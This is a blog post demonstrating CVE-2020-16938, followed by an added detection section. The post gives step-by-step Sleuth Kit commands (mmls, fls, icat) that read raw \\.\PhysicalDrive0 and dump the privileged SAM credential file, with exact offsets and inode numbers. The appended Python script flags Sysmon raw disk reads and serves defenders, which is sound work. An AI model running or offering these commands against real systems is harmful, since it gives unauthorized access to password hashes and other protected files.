Monday, November 9, 2020

Privileged arbitrary file read (CVE-2020-16938) with The Sleuth Kit

After I read a post on Twitter about @jonasLyk's CVE-2020-16938, I had an idea for doing it without using the 7-Zip File Manager to read privileged files. And I remembered one of the forensics tools for file systems, called "Sleuthkit".

I have a little experience with the Sleuth Kit from playing some forensics CTF challenges. For this arbitrary file read bug, I will use three tools from the Sleuth Kit: mmls, fls and icat.

The Sleuth Kit is a collection of command line tools and a C library that allows you to analyze disk images and recover files from them. It is used behind the scenes in Autopsy and many other open source and commercial forensics tools.

mmls : displays the layout of the partitions in a volume system, which includes partition tables and disk labels.

fls : lists the file and directory names in the image and can display the file names of recently deleted files in the directory with the given inode. If the inode argument is not given, the inode value for the root directory is used. For example, on an NTFS file system it would be 5 and on an Ext3 file system it would be 2.

icat : opens the named image(s) and copies the file with the specified inode number to standard output.

CVE-2020-16938: Privileged files could be read by opening the device volume. @jonasLyk used the 7-Zip File Manager to read privileged files for the PoC.

In this article, I will show that PoC without using the 7-Zip File Manager.

For the first step, check the volume system of "\\.\PhysicalDrive0" with mmls.

C:\sleuthkit>mmls "\\.\PhysicalDrive0"


Then you'll see two "Basic data partition" volumes. We need the start address of the first one, without the leading 0000: the address is 239616. After this, we need to find the address of the privileged file we want to read, using fls together with the offset 239616 from above.

C:\sleuthkit>fls -o 239616 -p -r \\.\physicaldrive0 | findstr /i "config/SAM"
-o
        The sector offset where the file system starts in the image.
-p
        Display the full path for each entry.
-r
        Recursively display directories.

The findstr command is used to grep for the file name we want (SAM). You can also use a file name with an extension, e.g. PrivilegedFile.txt.



Then we will see the address of the file we want to read. The address of the SAM file is 78248; we don't need the -128-4 part (the attribute type and id suffix that fls appends on NTFS). After we have the privileged file's address, we can read that file with icat using the offset and the file address.

C:\sleuthkit>icat -o 239616 \\.\physicaldrive0 78248



You can read the privileged file directly in the command prompt, or read it via Notepad using this command.

C:\sleuthkit>icat -o 239616 \\.\physicaldrive0 78248 > sam.txt



Boom!!! You can read any privileged file on the Windows system using this bug.
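Every step above (7-Zip or mmls/fls/icat) works by opening the disk device raw, which is exactly what Sysmon records as Event ID 9 (RawAccessRead). As an added example that is not part of the original post, here is a small detector run over constructed, flattened Event ID 9 records: it flags raw reads of a physical disk or volume by any image outside an allowlist. The field names follow Sysmon's schema; the flattened record format, the paths, the user names and the allowlist are assumptions.

```python
import re

# Constructed Sysmon records flattened to key=value text (assumed export format).
# Field names (EventID, Image, Device, User) are Sysmon's; paths and users are made up.
SAMPLE_EVENTS = [
    r"EventID=9 Image=C:\Windows\System32\vssvc.exe Device=\Device\HarddiskVolume3 User=NT AUTHORITY\SYSTEM",
    r"EventID=9 Image=C:\sleuthkit\mmls.exe Device=\Device\Harddisk0\DR0 User=LAB\alice",
    r"EventID=9 Image=C:\sleuthkit\fls.exe Device=\Device\Harddisk0\DR0 User=LAB\alice",
    r"EventID=9 Image=C:\sleuthkit\icat.exe Device=\Device\Harddisk0\DR0 User=LAB\alice",
    r"EventID=1 Image=C:\sleuthkit\icat.exe CommandLine=icat -o 239616 User=LAB\alice",
]
# Assumed allowlist of images that legitimately open disks raw (VSS, defrag); tune per estate.
DEFAULT_ALLOWLIST = {
    r"c:\windows\system32\vssvc.exe",
    r"c:\windows\system32\defrag.exe",
}
# Physical disks (\Device\Harddisk0\DR0 is \\.\PhysicalDrive0) and volumes (\Device\HarddiskVolumeN).
RAW_DISK_RE = re.compile(r"^\\Device\\Harddisk(\d+\\DR\d+|Volume\d+)$", re.IGNORECASE)
# key=value pairs where a value may contain spaces (e.g. "NT AUTHORITY\SYSTEM").
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_event(line):
    """Split one flattened record into a dict of field name -> value."""
    return {k: v for k, v in FIELD_RE.findall(line.strip())}

def raw_read_findings(lines, allowlist=DEFAULT_ALLOWLIST):
    """Return one finding per raw disk/volume read by an image outside the allowlist."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "9":
            continue  # only RawAccessRead events are relevant
        if not RAW_DISK_RE.match(ev.get("Device", "")):
            continue  # other devices (e.g. named pipes) are out of scope here
        image = ev.get("Image", "")
        if image.lower() in allowlist:
            continue
        findings.append({"image": image, "device": ev["Device"], "user": ev.get("User", "")})
    return findings

def actors(findings):
    """Group flagged tool names per user, so a chain like mmls -> fls -> icat stands out."""
    by_user = {}
    for f in findings:
        by_user.setdefault(f["user"], []).append(f["image"].rsplit("\\", 1)[-1].lower())
    return by_user

if __name__ == "__main__":
    for f in raw_read_findings(SAMPLE_EVENTS):
        print(f"raw read of {f['device']} by {f['image']} as {f['user']}")
```

Sysmon only emits Event ID 9 when a RawAccessRead rule is enabled in its configuration, so the detector is only as good as the logging it is fed.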

Thanks for reading. I hope you enjoy it.
